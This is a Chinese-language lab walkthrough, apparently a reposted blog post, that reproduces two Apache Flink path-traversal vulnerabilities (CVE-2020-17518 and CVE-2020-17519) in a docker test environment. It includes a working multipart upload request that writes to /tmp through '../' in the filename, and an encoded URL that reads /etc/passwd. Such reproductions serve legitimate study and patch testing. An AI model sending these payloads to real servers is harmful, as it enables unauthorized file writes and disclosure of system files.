前言
Apache Flink是一个框架和分布式处理引擎,用于对无界和有界数据流进行有状态计算。Flink设计为在所有常见的集群环境中运行,以内存速度和任何规模执行计算。
一、 CVE-2020-17518_Apache Flink Upload Path Traversal
漏洞原理
Apache Flink 1.5.1引入了一个REST处理程序,允许您通过恶意修改的HTTP头将上传的文件写入本地文件系统上的任意位置。
环境搭建
靶场:192.168.4.10_ubuntu
Execute following commands to start a Apache Flink jobmanager 1.11.2:
#docker-compose up -d
After the Apache Flink is started, visit `http://your-ip:8081` to view the homepage.
漏洞利用
Use following request to upload a file to `/tmp/success`:
```
POST /jars/upload HTTP/1.1
Host: localhost:8081
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryoZ8meKnrrso89R6Y
Content-Length: 187
------WebKitFormBoundaryoZ8meKnrrso89R6Y
Content-Disposition: form-data; name="jarfile"; filename="../../../../../../tmp/success"
success
------WebKitFormBoundaryoZ8meKnrrso89R6Y--
```
成功写入
二、 CVE-2020-17519_Apache Flink `jobmanager/logs` Path Traversal
漏洞原理
Apache Flink 1.11.0(以及1.11.1和1.11.2中发布的)中引入的一项更改允许攻击者通过JobManager进程的REST接口读取JobManager本地文件系统中的任何文件。
漏洞环境
Execute following commands to start a Apache Flink jobmanager 1.11.2:
#docker-compose up -d
漏洞利用
Disclose the `/etc/passwd`:
```
http://your-ip:8081/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
```
欢迎分享,转载请注明来源:内存溢出
评论列表(0条)